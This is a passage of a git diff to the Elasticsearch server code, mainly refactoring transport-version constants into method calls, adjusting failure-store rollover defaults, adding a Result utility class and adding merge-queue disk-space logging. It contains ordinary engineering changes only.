TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/cluster/SnapshotsInProgress.java b/server/src/main/java/org/elasticsearch/cluster/SnapshotsInProgress.java index 8390c00fc420a..049af499cefd6 100644 --- a/server/src/main/java/org/elasticsearch/cluster/SnapshotsInProgress.java +++ b/server/src/main/java/org/elasticsearch/cluster/SnapshotsInProgress.java @@ -302,7 +302,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } private static final TransportVersion DIFFABLE_VERSION = TransportVersions.V_8_5_0; @@ -1826,7 +1826,7 @@ public SnapshotsInProgress apply(Custom part) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/ComponentTemplateMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/ComponentTemplateMetadata.java index 123fb4f9f6d2e..4bd86b540c52f 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/ComponentTemplateMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/ComponentTemplateMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.metadata; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -89,7 +88,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -166,7 +165,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/ComposableIndexTemplateMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/ComposableIndexTemplateMetadata.java index eec34514b9c7c..596fa18a0cee2 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/ComposableIndexTemplateMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/ComposableIndexTemplateMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.metadata; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -94,7 +93,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -167,7 +166,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/DataStream.java b/server/src/main/java/org/elasticsearch/cluster/metadata/DataStream.java index 69e15a2b98889..a72d2edb4ea34 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/DataStream.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/DataStream.java @@ -211,7 +211,12 @@ public DataStream( lifecycle, dataStreamOptions, new DataStreamIndices(BACKING_INDEX_PREFIX, List.copyOf(indices), rolloverOnWrite, autoShardingEvent), - new DataStreamIndices(FAILURE_STORE_PREFIX, List.copyOf(failureIndices), false, null) + new DataStreamIndices( + FAILURE_STORE_PREFIX, + List.copyOf(failureIndices), + (replicated == false && failureIndices.isEmpty()), + null + ) ); } @@ -280,8 +285,15 @@ public static DataStream read(StreamInput in) throws IOException { backingIndicesBuilder.setAutoShardingEvent(in.readOptionalWriteable(DataStreamAutoShardingEvent::new)); } if (in.getTransportVersion().onOrAfter(TransportVersions.V_8_15_0)) { - failureIndicesBuilder.setRolloverOnWrite(in.readBoolean()) + // Read the rollover on write flag from the stream, but force it on if the failure indices are empty and we're not replicating + boolean failureStoreRolloverOnWrite = in.readBoolean() || (replicated == false && failureIndices.isEmpty()); + failureIndicesBuilder.setRolloverOnWrite(failureStoreRolloverOnWrite) .setAutoShardingEvent(in.readOptionalWriteable(DataStreamAutoShardingEvent::new)); + } else { + // If we are reading from an older version that does not have these fields, just default + // to a reasonable value for rollover on write for the failure store + boolean failureStoreRolloverOnWrite = replicated == false && failureIndices.isEmpty(); + failureIndicesBuilder.setRolloverOnWrite(failureStoreRolloverOnWrite); } DataStreamOptions dataStreamOptions; if (in.getTransportVersion().onOrAfter(TransportVersions.V_8_16_0)) { @@ -1434,7 +1446,11 @@ public void writeTo(StreamOutput out) throws IOException { new DataStreamIndices( FAILURE_STORE_PREFIX, args[13] != null ? (List) args[13] : List.of(), - args[14] != null && (boolean) args[14], + // If replicated (args[5]) is null or exists and is false, and the failure index list (args[13]) is null or + // exists and is empty, then force the rollover on write field to true. If none of those conditions are met, + // then use the rollover on write value (args[14]) present in the parser. + ((args[5] == null || ((boolean) args[5] == false)) && (args[13] == null || ((List) args[13]).isEmpty())) + || (args[14] != null && (boolean) args[14]), (DataStreamAutoShardingEvent) args[15] ) ) diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/DataStreamMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/DataStreamMetadata.java index ebba302a14175..769bd8afc6ee6 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/DataStreamMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/DataStreamMetadata.java @@ -11,7 +11,6 @@ import org.elasticsearch.ResourceNotFoundException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -218,7 +217,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -315,7 +314,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/IndexGraveyard.java b/server/src/main/java/org/elasticsearch/cluster/metadata/IndexGraveyard.java index ba1f236ac75b5..1b979766c90dd 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/IndexGraveyard.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/IndexGraveyard.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.metadata; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.NamedDiff; import org.elasticsearch.common.io.stream.StreamInput; @@ -90,7 +89,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override @@ -336,7 +335,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/MetadataDataStreamsService.java b/server/src/main/java/org/elasticsearch/cluster/metadata/MetadataDataStreamsService.java index 40a2e23241e83..de7c338c1083f 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/MetadataDataStreamsService.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/MetadataDataStreamsService.java @@ -452,10 +452,9 @@ private DataStream createDataStreamForUpdatedDataStreamSettings( ProjectMetadata projectMetadata = clusterState.metadata().getProject(projectId); Map dataStreamMap = projectMetadata.dataStreams(); DataStream dataStream = dataStreamMap.get(dataStreamName); - Settings existingSettings = dataStream.getSettings(); + Settings existingDataStreamSettings = dataStream.getSettings(); - Template.Builder templateBuilder = Template.builder(); - Settings.Builder mergedSettingsBuilder = Settings.builder().put(existingSettings).put(settingsOverrides); + Settings.Builder mergedSettingsBuilder = Settings.builder().put(existingDataStreamSettings).put(settingsOverrides); /* * A null value for a setting override means that we remove it from the data stream, and let the value from the template (if any) * be used. @@ -465,18 +464,14 @@ private DataStream createDataStreamForUpdatedDataStreamSettings( mergedSettingsBuilder.remove(key); } }); - Settings mergedSettings = mergedSettingsBuilder.build(); + Settings mergedDataStreamSettings = mergedSettingsBuilder.build(); final ComposableIndexTemplate template = lookupTemplateForDataStream(dataStreamName, projectMetadata); - ComposableIndexTemplate mergedTemplate = template.mergeSettings(mergedSettings); - MetadataIndexTemplateService.validateTemplate( - mergedTemplate.template().settings(), - mergedTemplate.template().mappings(), - indicesService - ); + Settings templateSettings = MetadataIndexTemplateService.resolveSettings(template, projectMetadata.componentTemplates()); + Settings mergedEffectiveSettings = templateSettings.merge(mergedDataStreamSettings); + MetadataIndexTemplateService.validateTemplate(mergedEffectiveSettings, ComposableIndexTemplate.EMPTY_MAPPINGS, indicesService); - templateBuilder.settings(mergedSettingsBuilder); - return dataStream.copy().setSettings(mergedSettings).build(); + return dataStream.copy().setSettings(mergedDataStreamSettings).build(); } private static void addBackingIndex( diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/NodesShutdownMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/NodesShutdownMetadata.java index 63810f2b4a3bc..070eb006ea6d4 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/NodesShutdownMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/NodesShutdownMetadata.java @@ -10,7 +10,6 @@ package org.elasticsearch.cluster.metadata; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -172,7 +171,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -235,7 +234,7 @@ static Diff readNodesDiffFrom(StreamInput in) throws @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/RepositoriesMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/RepositoriesMetadata.java index 512d7e6e551b8..1cdff3f844b10 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/RepositoriesMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/RepositoriesMetadata.java @@ -11,7 +11,6 @@ import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.NamedDiff; @@ -180,7 +179,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } public RepositoriesMetadata(StreamInput in) throws IOException { diff --git a/server/src/main/java/org/elasticsearch/cluster/metadata/StreamsMetadata.java b/server/src/main/java/org/elasticsearch/cluster/metadata/StreamsMetadata.java index 99758350559d3..7ce18541f9413 100644 --- a/server/src/main/java/org/elasticsearch/cluster/metadata/StreamsMetadata.java +++ b/server/src/main/java/org/elasticsearch/cluster/metadata/StreamsMetadata.java @@ -17,7 +17,10 @@ import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.xcontent.ChunkedToXContentHelper; +import org.elasticsearch.xcontent.ConstructingObjectParser; +import org.elasticsearch.xcontent.ParseField; import org.elasticsearch.xcontent.ToXContent; +import org.elasticsearch.xcontent.XContentParser; import java.io.IOException; import java.util.EnumSet; @@ -32,6 +35,14 @@ public class StreamsMetadata extends AbstractNamedDiffable PARSER = new ConstructingObjectParser<>(TYPE, false, args -> { + boolean logsEnabled = (boolean) args[0]; + return new StreamsMetadata(logsEnabled); + }); + static { + PARSER.declareBoolean(ConstructingObjectParser.constructorArg(), LOGS_ENABLED); + } public boolean logsEnabled; @@ -79,7 +90,9 @@ public void writeTo(StreamOutput out) throws IOException { @Override public Iterator toXContentChunked(ToXContent.Params params) { - return Iterators.concat(ChunkedToXContentHelper.chunk((builder, bParams) -> builder.field("logs_enabled", logsEnabled))); + return Iterators.concat( + ChunkedToXContentHelper.chunk((builder, bParams) -> builder.field(LOGS_ENABLED.getPreferredName(), logsEnabled)) + ); } @Override @@ -95,4 +108,8 @@ public boolean equals(Object o) { public int hashCode() { return Objects.hashCode(logsEnabled); } + + public static StreamsMetadata fromXContent(XContentParser parser) throws IOException { + return PARSER.parse(parser, null); + } } diff --git a/server/src/main/java/org/elasticsearch/cluster/version/CompatibilityVersions.java b/server/src/main/java/org/elasticsearch/cluster/version/CompatibilityVersions.java index f4f9d2dbc1e34..3c8438c93c977 100644 --- a/server/src/main/java/org/elasticsearch/cluster/version/CompatibilityVersions.java +++ b/server/src/main/java/org/elasticsearch/cluster/version/CompatibilityVersions.java @@ -40,7 +40,7 @@ public record CompatibilityVersions( Map systemIndexMappingsVersion ) implements Writeable, ToXContentFragment { - public static final CompatibilityVersions EMPTY = new CompatibilityVersions(TransportVersions.MINIMUM_COMPATIBLE, Map.of()); + public static final CompatibilityVersions EMPTY = new CompatibilityVersions(TransportVersion.minimumCompatible(), Map.of()); /** * Constructs a VersionWrapper collecting all the minimum versions from the values of the map. diff --git a/server/src/main/java/org/elasticsearch/common/bytes/BytesReference.java b/server/src/main/java/org/elasticsearch/common/bytes/BytesReference.java index ddcfc1ea7eed8..26df48fc9ec24 100644 --- a/server/src/main/java/org/elasticsearch/common/bytes/BytesReference.java +++ b/server/src/main/java/org/elasticsearch/common/bytes/BytesReference.java @@ -159,7 +159,10 @@ static BytesReference fromByteArray(ByteArray byteArray, int length) { BytesReference slice(int from, int length); /** - * The amount of memory used by this BytesReference + * The amount of memory used by this BytesReference. + *

+ * Note that this is not always the same as length and can vary by implementation. + *

*/ long ramBytesUsed(); diff --git a/server/src/main/java/org/elasticsearch/common/util/Result.java b/server/src/main/java/org/elasticsearch/common/util/Result.java new file mode 100644 index 0000000000000..57bcb56861da9 --- /dev/null +++ b/server/src/main/java/org/elasticsearch/common/util/Result.java @@ -0,0 +1,102 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.common.util; + +import org.elasticsearch.common.CheckedSupplier; + +import java.util.Optional; + +/** + * A wrapper around either + *
    + *
  • a successful result of parameterized type {@code V}
  • + *
  • a failure with exception type {@code E}
  • + *
+ */ +public abstract class Result implements CheckedSupplier { + + public static Result of(V value) { + return new Success<>(value); + } + + public static Result failure(E exception) { + return new Failure<>(exception); + } + + private Result() {} + + public abstract V get() throws E; + + public abstract Optional failure(); + + public abstract boolean isSuccessful(); + + public boolean isFailure() { + return isSuccessful() == false; + }; + + public abstract Optional asOptional(); + + private static class Success extends Result { + private final V value; + + Success(V value) { + this.value = value; + } + + @Override + public V get() throws E { + return value; + } + + @Override + public Optional failure() { + return Optional.empty(); + } + + @Override + public boolean isSuccessful() { + return true; + } + + @Override + public Optional asOptional() { + return Optional.of(value); + } + } + + private static class Failure extends Result { + private final E exception; + + Failure(E exception) { + this.exception = exception; + } + + @Override + public V get() throws E { + throw exception; + } + + @Override + public Optional failure() { + return Optional.of(exception); + } + + @Override + public boolean isSuccessful() { + return false; + } + + @Override + public Optional asOptional() { + return Optional.empty(); + } + } +} diff --git a/server/src/main/java/org/elasticsearch/common/xcontent/support/XContentMapValues.java b/server/src/main/java/org/elasticsearch/common/xcontent/support/XContentMapValues.java index a1ba3759c7854..74bf3b9b5ff62 100644 --- a/server/src/main/java/org/elasticsearch/common/xcontent/support/XContentMapValues.java +++ b/server/src/main/java/org/elasticsearch/common/xcontent/support/XContentMapValues.java @@ -560,6 +560,9 @@ public static Map nodeMapValue(Object node, String desc) { * Otherwise the node is treated as a comma-separated string. */ public static String[] nodeStringArrayValue(Object node) { + if (node == null) { + throw new ElasticsearchParseException("Expected a list of strings but got null"); + } if (isArray(node)) { List list = (List) node; String[] arr = new String[list.size()]; diff --git a/server/src/main/java/org/elasticsearch/index/IndexVersions.java b/server/src/main/java/org/elasticsearch/index/IndexVersions.java index 6ff33cf05d51f..2e464afa72b76 100644 --- a/server/src/main/java/org/elasticsearch/index/IndexVersions.java +++ b/server/src/main/java/org/elasticsearch/index/IndexVersions.java @@ -145,6 +145,7 @@ private static Version parseUnchecked(String version) { public static final IndexVersion MAPPER_TEXT_MATCH_ONLY_MULTI_FIELDS_DEFAULT_NOT_STORED_8_19 = def(8_533_0_00, Version.LUCENE_9_12_1); public static final IndexVersion UPGRADE_TO_LUCENE_9_12_2 = def(8_534_0_00, Version.LUCENE_9_12_2); public static final IndexVersion SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X = def(8_535_0_00, Version.LUCENE_9_12_2); + public static final IndexVersion MATCH_ONLY_TEXT_STORED_AS_BYTES_BACKPORT_8_X = def(8_536_0_00, Version.LUCENE_9_12_2); public static final IndexVersion UPGRADE_TO_LUCENE_10_0_0 = def(9_000_0_00, Version.LUCENE_10_0_0); public static final IndexVersion LOGSDB_DEFAULT_IGNORE_DYNAMIC_BEYOND_LIMIT = def(9_001_0_00, Version.LUCENE_10_0_0); public static final IndexVersion TIME_BASED_K_ORDERED_DOC_ID = def(9_002_0_00, Version.LUCENE_10_0_0); @@ -178,6 +179,7 @@ private static Version parseUnchecked(String version) { public static final IndexVersion UPGRADE_TO_LUCENE_10_2_2 = def(9_030_0_00, Version.LUCENE_10_2_2); public static final IndexVersion SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT = def(9_031_0_00, Version.LUCENE_10_2_2); public static final IndexVersion DEFAULT_DENSE_VECTOR_TO_BBQ_HNSW = def(9_032_0_00, Version.LUCENE_10_2_2); + public static final IndexVersion MATCH_ONLY_TEXT_STORED_AS_BYTES = def(9_033_0_00, Version.LUCENE_10_2_2); /* * STOP! READ THIS FIRST! No, really, diff --git a/server/src/main/java/org/elasticsearch/index/codec/tsdb/es819/DocValuesConsumerUtil.java b/server/src/main/java/org/elasticsearch/index/codec/tsdb/es819/DocValuesConsumerUtil.java index c29585f173316..4e9bf9c09a3b0 100644 --- a/server/src/main/java/org/elasticsearch/index/codec/tsdb/es819/DocValuesConsumerUtil.java +++ b/server/src/main/java/org/elasticsearch/index/codec/tsdb/es819/DocValuesConsumerUtil.java @@ -24,7 +24,7 @@ class DocValuesConsumerUtil { record MergeStats(boolean supported, long sumNumValues, int sumNumDocsWithField, int minLength, int maxLength) {} - static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, MergeState mergeState, FieldInfo fieldInfo) { + static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, MergeState mergeState, FieldInfo mergedFieldInfo) { if (optimizedMergeEnabled == false || mergeState.needsIndexSort == false) { return UNSUPPORTED; } @@ -42,6 +42,10 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me int maxLength = 0; for (int i = 0; i < mergeState.docValuesProducers.length; i++) { + final FieldInfo fieldInfo = mergeState.fieldInfos[i].fieldInfo(mergedFieldInfo.name); + if (fieldInfo == null) { + continue; + } DocValuesProducer docValuesProducer = mergeState.docValuesProducers[i]; if (docValuesProducer instanceof FilterDocValuesProducer filterDocValuesProducer) { docValuesProducer = filterDocValuesProducer.getIn(); @@ -60,6 +64,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me if (entry != null) { sumNumValues += entry.numValues; sumNumDocsWithField += entry.numDocsWithField; + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } case SORTED_NUMERIC -> { @@ -67,6 +74,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me if (entry != null) { sumNumValues += entry.numValues; sumNumDocsWithField += entry.numDocsWithField; + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } case SORTED -> { @@ -74,6 +84,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me if (entry != null) { sumNumValues += entry.ordsEntry.numValues; sumNumDocsWithField += entry.ordsEntry.numDocsWithField; + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } case SORTED_SET -> { @@ -86,6 +99,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me sumNumValues += entry.ordsEntry.numValues; sumNumDocsWithField += entry.ordsEntry.numDocsWithField; } + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } case BINARY -> { @@ -94,6 +110,9 @@ static MergeStats compatibleWithOptimizedMerge(boolean optimizedMergeEnabled, Me sumNumDocsWithField += entry.numDocsWithField; minLength = Math.min(minLength, entry.minLength); maxLength = Math.max(maxLength, entry.maxLength); + } else { + assert false : "unexpectedly got no entry for field [" + fieldInfo.number + "\\" + fieldInfo.name + "]"; + return UNSUPPORTED; } } default -> throw new IllegalStateException("unexpected doc values producer type: " + fieldInfo.getDocValuesType()); diff --git a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormat.java b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormat.java index 5df81c35bbd40..146164b55f00a 100644 --- a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormat.java +++ b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormat.java @@ -87,7 +87,7 @@ */ public class ES818BinaryQuantizedVectorsFormat extends FlatVectorsFormat { - static final boolean USE_DIRECT_IO = Boolean.parseBoolean(System.getProperty("vector.rescoring.directio", "true")); + public static final boolean USE_DIRECT_IO = Boolean.parseBoolean(System.getProperty("vector.rescoring.directio", "false")); public static final String BINARIZED_VECTOR_COMPONENT = "BVEC"; public static final String NAME = "ES818BinaryQuantizedVectorsFormat"; diff --git a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsReader.java b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsReader.java index dd3e59be26460..6de775c4773b5 100644 --- a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsReader.java +++ b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsReader.java @@ -65,7 +65,7 @@ public class ES818BinaryQuantizedVectorsReader extends FlatVectorsReader impleme private static final long SHALLOW_SIZE = RamUsageEstimator.shallowSizeOfInstance(ES818BinaryQuantizedVectorsReader.class); - private final Map fields = new HashMap<>(); + private final Map fields; private final IndexInput quantizedVectorData; private final FlatVectorsReader rawVectorsReader; private final ES818BinaryFlatVectorsScorer vectorScorer; @@ -77,6 +77,7 @@ public class ES818BinaryQuantizedVectorsReader extends FlatVectorsReader impleme ES818BinaryFlatVectorsScorer vectorsScorer ) throws IOException { super(vectorsScorer); + this.fields = new HashMap<>(); this.vectorScorer = vectorsScorer; this.rawVectorsReader = rawVectorsReader; int versionMeta = -1; @@ -120,6 +121,24 @@ public class ES818BinaryQuantizedVectorsReader extends FlatVectorsReader impleme } } + private ES818BinaryQuantizedVectorsReader(ES818BinaryQuantizedVectorsReader clone, FlatVectorsReader rawVectorsReader) { + super(clone.vectorScorer); + this.rawVectorsReader = rawVectorsReader; + this.vectorScorer = clone.vectorScorer; + this.quantizedVectorData = clone.quantizedVectorData; + this.fields = clone.fields; + } + + // For testing + FlatVectorsReader getRawVectorsReader() { + return rawVectorsReader; + } + + @Override + public FlatVectorsReader getMergeInstance() { + return new ES818BinaryQuantizedVectorsReader(this, rawVectorsReader.getMergeInstance()); + } + private void readFields(ChecksumIndexInput meta, FieldInfos infos) throws IOException { for (int fieldNumber = meta.readInt(); fieldNumber != -1; fieldNumber = meta.readInt()) { FieldInfo info = infos.fieldInfo(fieldNumber); diff --git a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/MergeReaderWrapper.java b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/MergeReaderWrapper.java index 4d9d7e03848c8..e74b0aad12723 100644 --- a/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/MergeReaderWrapper.java +++ b/server/src/main/java/org/elasticsearch/index/codec/vectors/es818/MergeReaderWrapper.java @@ -36,6 +36,11 @@ protected MergeReaderWrapper(FlatVectorsReader mainReader, FlatVectorsReader mer this.mergeReader = mergeReader; } + // For testing + FlatVectorsReader getMainReader() { + return mainReader; + } + @Override public RandomVectorScorer getRandomVectorScorer(String field, float[] target) throws IOException { return mainReader.getRandomVectorScorer(field, target); diff --git a/server/src/main/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorService.java b/server/src/main/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorService.java index f6e9257200002..9efb582007aaf 100644 --- a/server/src/main/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorService.java +++ b/server/src/main/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorService.java @@ -35,6 +35,7 @@ import java.util.IdentityHashMap; import java.util.Iterator; import java.util.List; +import java.util.Locale; import java.util.Map; import java.util.PriorityQueue; import java.util.Set; @@ -552,6 +553,8 @@ private static ByteSizeValue getFreeBytesThreshold( } static class MergeTaskPriorityBlockingQueue extends PriorityBlockingQueueWithBudget { + private static final Logger LOGGER = LogManager.getLogger(MergeTaskPriorityBlockingQueue.class); + MergeTaskPriorityBlockingQueue() { // by default, start with 0 budget (so takes on this queue will always block until the first {@link #updateBudget} is invoked) // use the estimated *remaining* merge size as the budget function so that the disk space budget of elements is updated @@ -567,6 +570,55 @@ long getAvailableBudget() { MergeTask peekQueue() { return enqueuedByBudget.peek().v1(); } + + @Override + void postBudgetUpdate() { + assert super.lock.isHeldByCurrentThread(); + Tuple head = enqueuedByBudget.peek(); + if (head != null && head.v2() > availableBudget) { + LOGGER.warn( + String.format( + Locale.ROOT, + "There are merge tasks enqueued but there's insufficient disk space available to execute them " + + "(the smallest merge task requires [%d] bytes, but the available disk space is only [%d] bytes)", + head.v2(), + availableBudget + ) + ); + if (LOGGER.isDebugEnabled()) { + if (unreleasedBudgetPerElement.isEmpty()) { + LOGGER.debug( + String.format( + Locale.ROOT, + "There are no merge tasks currently running, " + + "but there are [%d] enqueued ones that are blocked because of insufficient disk space " + + "(the smallest merge task requires [%d] bytes, but the available disk space is only [%d] bytes)", + enqueuedByBudget.size(), + head.v2(), + availableBudget + ) + ); + } else { + StringBuilder messageBuilder = new StringBuilder(); + messageBuilder.append("The following merge tasks are currently running ["); + for (var runningMergeTask : super.unreleasedBudgetPerElement.entrySet()) { + messageBuilder.append(runningMergeTask.getKey().element().toString()); + messageBuilder.append(" with disk space budgets in bytes ").append(runningMergeTask.getValue()).append(" , "); + } + messageBuilder.delete(messageBuilder.length() - 3, messageBuilder.length()); + messageBuilder.append("], and there are [") + .append(enqueuedByBudget.size()) + .append("] additional enqueued ones that are blocked because of insufficient disk space"); + messageBuilder.append(" (the smallest merge task requires [") + .append(head.v2()) + .append("] bytes, but the available disk space is only [") + .append(availableBudget) + .append("] bytes)"); + LOGGER.debug(messageBuilder.toString()); + } + } + } + } } /** @@ -576,7 +628,7 @@ MergeTask peekQueue() { static class PriorityBlockingQueueWithBudget { private final ToLongFunction budgetFunction; protected final PriorityQueue> enqueuedByBudget; - private final IdentityHashMap unreleasedBudgetPerElement; + protected final IdentityHashMap unreleasedBudgetPerElement; private final ReentrantLock lock; private final Condition elementAvailable; protected long availableBudget; @@ -637,15 +689,23 @@ void updateBudget(long availableBudget) { // updates the budget of enqueued elements (and possibly reorders the priority queue) updateBudgetOfEnqueuedElementsAndReorderQueue(); // update the budget of dequeued, but still in-use elements (these are the elements that are consuming budget) - unreleasedBudgetPerElement.replaceAll((e, v) -> budgetFunction.applyAsLong(e.element())); + unreleasedBudgetPerElement.replaceAll((e, v) -> v.updateBudgetEstimation(budgetFunction.applyAsLong(e.element()))); // the available budget is decreased by the budget of still in-use elements (dequeued elements that are still in-use) - this.availableBudget -= unreleasedBudgetPerElement.values().stream().mapToLong(i -> i).sum(); + this.availableBudget -= unreleasedBudgetPerElement.values() + .stream() + .mapToLong(i -> i.latestBudgetEstimationForElement) + .sum(); elementAvailable.signalAll(); + postBudgetUpdate(); } finally { lock.unlock(); } } + void postBudgetUpdate() { + assert lock.isHeldByCurrentThread(); + }; + private void updateBudgetOfEnqueuedElementsAndReorderQueue() { assert this.lock.isHeldByCurrentThread(); int queueSizeBefore = enqueuedByBudget.size(); @@ -686,7 +746,7 @@ private ElementWithReleasableBudget newElementWithReleasableBudget(E element, lo ElementWithReleasableBudget elementWithReleasableBudget = new ElementWithReleasableBudget(element); assert this.lock.isHeldByCurrentThread(); // the taken element holds up some budget - var prev = this.unreleasedBudgetPerElement.put(elementWithReleasableBudget, budget); + var prev = this.unreleasedBudgetPerElement.put(elementWithReleasableBudget, new Budgets(budget, budget, this.availableBudget)); assert prev == null; this.availableBudget -= budget; assert this.availableBudget >= 0L; @@ -736,6 +796,16 @@ E element() { return element; } } + + record Budgets(long initialBudgetEstimationForElement, long 